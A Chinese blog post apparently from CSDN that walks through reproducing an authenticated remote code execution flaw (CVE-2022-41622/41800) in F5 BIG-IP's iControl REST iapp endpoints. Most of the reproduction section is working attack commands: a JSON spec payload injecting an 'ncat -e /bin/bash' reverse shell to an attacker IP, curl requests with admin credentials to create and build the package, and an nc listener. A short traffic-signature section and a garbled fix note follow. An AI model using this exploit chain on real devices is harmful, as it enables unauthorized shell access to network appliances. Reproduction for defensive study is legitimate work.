CVE-2022-41622 & CVE-2022-41800 F5 BIG-IP和BIG-IQ远程代码执行漏洞复现

最新推荐文章于 2024-06-04 20:24:29 发布
最新推荐文章于 2024-06-04 20:24:29 发布
阅读量1.4k 收藏
点赞数
分类专栏: 漏洞复现【Pay】 文章标签: tcp/ip 网络协议 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44281295/article/details/128099642
版权
本文介绍了CVE-2022-41622和CVE-2022-41800,这两个针对F5 BIG-IP和BIG-IQ的远程代码执行漏洞。文章详细阐述了漏洞概述,受影响的版本,并提供了环境搭建、漏洞复现的步骤,包括构造JSON Payload、发送请求以及流量分析。同时,文章给出了修复建议,提示用户升级到修复版本。
摘要由CSDN通过智能技术生成

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

下载&安装

登录web页面:

0x06 漏洞复现:

构造JSON Payload:

发送请求

查看服务端:

攻击主机启动监听器:

使用jq格式化输出:

监听成功:

0x07 流量分析:

特征一:

客户端:

URL:

DATA:

Shell流量:

0x08 修复建议:

0x01 声明:

        仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

        F5Networks(纳斯达克: FFIV),全球领先的应用交付网络(ADN)领域的厂商,创建于1996年,总部位于美国西雅图市,F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用,通过交付云与安全解决方案,F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构。

0x03 漏洞概述:

        在设备模式下运行时,分配了管理员角色的经过身份验证的用户可能能够利用未公开的 iControl REST 端点绕过设备模式限制。成功利用此漏洞可使攻击者跨越安全边界,在装置模式下运行时,分配了管理员角色的已验证用户可能能够利用未公开的iControl REST端点绕过装置模式限制。成功利用此漏洞可使攻击者跨越安全边界。

0x04 影响版本:

BIG-IP <17.x

0x05 环境搭建:

下载&安装

参考这篇文章: (CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现_Evan Kang的博客-CSDN博客)

登录web页面:

0x06 漏洞复现:

构造JSON Payload:

{
  "specFileData": {
    "name": "test",
    "srcBasePath": "/tmp",
    "version": "test6",
    "release": "test7",
    "description": "test8\n\n%check\nncat -e /bin/bash 192.168.119.243 4444",
    "summary": "test9"
  }
}

发送请求

curl -sk -u admin:P@ssw0rd -H "Content-Type: application/json" -X POST https://192.168.119.220/mgmt/shared/iapp/rpm-spec-creator --data '{"specFileData":{"name":"test","srcBasePath":"/tmp","version":"test6","release":"test7","description":"test8\n\n%check\nncat -e /bin/bash 192.168.119.243 4444","summary":"test9","user":"restnoded","group":"restnoded"},"specFilePath":"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec"}'

查看服务端:

判断请求是否成功

cat /var/config/rest/node/tmp/*.spec

攻击主机启动监听器:

nc -lvp 4444

使用jq格式化输出:

Jq安装:

wget http://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm

rpm -ivh epel-release-latest-7.noarch.rpm

yum repolist

yum -y install jq

curl -X POST -k -u admin:P@ssw0rd https://192.168.119.220/mgmt/shared/iapp/build-package --data '{"state": {}, "appName": "test", "packageDirectory": "/tmp", "specFilePath": "/var/config/rest/node/tmp/af35efa2-483e-4b6c-a6be-0c4bf11e36b7.spec", "force": true }' | jq

监听成功:

0x07 流量分析:

特征一:

客户端:

URL:

/mgmt/shared/iapp/build-package

DATA:

  1. check\nncat -e /bin/bash 192.168.119.243
  2. specFilePath: xxx.spec

Shell流量:

0x08 修复建议:

        如果您运行的是已知易受攻击的版本列中列出的版本,可以通过升级到中引入的修复 列中的值。如果该表仅列出比当前运行的版本旧的版本,或者未列出不易受攻击的版本,则当前不存在升级候选版本。

https://support.f5.com/csp/article/K13325942

Kang_Sec
关注
专栏目录
Dirty-Pipe Linux内核提权漏洞复现CVE-2022-0847)
IerkeU的博客
03-09 5319
漏洞描述 CVE-2022-0847-DirtyPipe-Exploit 存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件(甚至是只读文件)中的数据,从而可将普通权限的用户提升到root权限。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用,漏洞作者将此漏洞命名为Dirty Pipe。 影响版本 影响范围:5.8 <= Linux 内核版本 < 5.16.11 /
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现
qq_32660043的博客
03-22 4328
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
weixin_45715461的博客
07-11 3321
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
CVE-2022-30190 MSDT远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-29 1505
Microsoft Office 是由 Microsoft (微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint 等。Microsoft Office 存在远程代码执行漏洞,攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell 代码
CVE-2022-33891 Apache Spark 命令注入复现
weixin_45260839的博客
07-28 1333
CVE-2022-33891 Apache Spark 命令注入复现
CVE-2022-30887漏洞复现
2301_78321656的博客
07-10 1647
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。6.复制路径http://eci-2zeidvpxyny5m513h4w4.cloudeci1.ichunqiu.com/assets/myimages/3.php使用中国蚁剑工具连接。3.找到上传点,编辑上传PHP一句话木马。
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
F5 BIG-IP IQ 2021漏洞CVE-2021-22986:远程代码执行风险
### CVE-2021-22986: F5 BIG-IP-IQ远程代码执行漏洞分析 **背景**: CVE-2021-22986是一个针对F5 BIG-IP设备及其附属产品BIG-IP IQ(Intelligence Query)的安全漏洞。该漏洞允许攻击者通过不安全的API调用,...
CVE-2021-22986:CVE-2021-22986和F5 BIG-IP RCE
03-25
漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。 此漏洞只能通过控制平面利用,而不能通过数据平面利用。 剥削...
Apache Shiro 身份认证绕过漏洞(CVE-2022-32532)漏洞复现
web13618542420的博客
09-02 1162
Apache Shiro 是一个强大且易用的 Java 安全框架,通过它可以执行身份验证、授权、密码和会话管理。使用 Shiro 的易用 API,您可以快速、轻松地保护任何应用程序 —— 从最小的移动应用程序到最大的 WEB 和企业应用程序。
CVE-2022-32532 Apache Shiro RegExPatternMatcher 认证绕过复现
m0_67394002的博客
08-14 320
大白话,其实就是在shiro-core-1.9.0.jar中存在一个RegExPatternMatcher类,这个类的Pattern存在带.的正则表达式匹配,如果存在/n或/r字符时,就会判断错误。6月29日,Apache 官方披露 Apache Shiro 权限绕过漏洞(CVE-2022-32532),当 Apache Shiro 中使用 RegexRequestMatcher 进行权限配置,且正则表达式中携带“.”时,未经授权的远程攻击者可通过构造恶意数据包绕过身份认证。渗透机:Kali Linux。.
CVE-2022-32991
qq_63928796的博客
10-11 3168
发现可能存在sql注入漏洞,进而查看一下源码,mysqli_query没有任何的过滤。进去漏洞页面后正常注册登录,发现了p参数和welcome.php界面。该CMS的welcome.php中存在SQL注入攻击。保存成1.txt用sqlmap梭一下。用Seay源码审计一下。
CVE-2022-22947
最新发布
weixin_74020633的博客
06-04 1193
因为该漏洞是在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行。至此我们利用这个CVE 通过添加查询路由的方式可以进行远程的命令执行,那么为什么能够利用呢,就涉及到java和函数方面,本人暂时没有学习java但是可以大致分享一下我学习到的。总结:这个漏洞是利用spEL表达式来包含命令,使得恶意的命令能被解析执行,在通过查询路由来回显信息,达到远程执行的目的。
CVE-2022-35741 Apache CloudStack SAML XXE注入
include_voidmain的博客
09-08 584
CVE-2022-35741 Apache CloudStack SAML XXE注入
[春秋云镜]CVE-2022-0543
niubi707的博客
12-13 920
春秋云镜CVE-2022-0543靶场通关
CVE-2022-32430分析
azraelxuemo的博客
12-06 1931
cve分析
CVE-2022-25237 Bonitasoft Platform RCE漏洞复现
热爱学习,喜欢折腾!
10-19 1577
Bonitasoft 是一个业务自动化平台,可以更轻松地在业务流程中构建、部署和管理自动化应用程序;Bonita 是一个用于业务流程自动化和优化的开源和可扩展平台。在Bonitasoft Authorization漏洞版本,由于 API 授权过滤器中配置问题,通过精心构造的的字符串附加到 API URL,能够绕过权限认证。拥有普通用户权限的攻击者在绕过权限认证后,将恶意代码部署到服务器上,进行远程代码执行
『Java CVECVE-2022-42889: Apache Commons Text RCE(Text4Shell)
Ho1aAs‘s Blog
10-24 2260
# 影响版本 Apache Commons Text ≤ 1.9 # 漏洞原理 插值器允许执行script 原理跟CVE-2022-33980: Apache Commons Configuration读文件RCE一样
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 6231
通过exp实现了对微软目前存在的office-word-2016的成功复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kang_Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值